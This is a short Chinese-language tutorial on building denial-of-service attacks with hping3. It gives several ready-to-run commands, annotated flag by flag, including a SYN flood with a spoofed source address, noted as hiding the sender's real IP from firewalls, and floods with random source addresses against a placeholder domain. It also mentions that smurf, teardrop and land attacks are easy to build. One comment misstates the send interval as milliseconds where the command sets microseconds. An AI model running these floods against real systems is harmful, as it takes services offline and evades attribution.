拒绝服务攻击与周边

hping3

---

使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接，伪造源地址为192.168.10.99，并使用1000微秒的间隔发送各个SYN包。

hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000 #-I 网络接口地址 -a 伪造ip地址，防火墙就不会记录你的真实ip了，当然回应的包也无法接收了 -S 发送SYN数据包 -p 设置目标端口 -i 包发送间隔时间（1000毫秒）

其他攻击如smurf、teardrop、land attack等也很容易构建出来。

hping3 -S --flood -V www.xxx.com #-S 发送SYN数据包 --flood 尽可能快地发送包，不考虑数据回应 -V 显示输出 

hping3 -S -P -U --flood -V --rand-source  www.xxx.com # -S 发送SYN数据包 -P 发送PUSH数据包 -U 发送URG数据包 --flood 尽可能快地发送包，不考虑数据回应 -V 显示输出 --rand-source 发送随机源地址的包

hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source www.xxx.com # -C 发送包数目 -d 数据包大小 -w Set TCP window size. Default is 64. --rand-source 发送随机源地址的数据包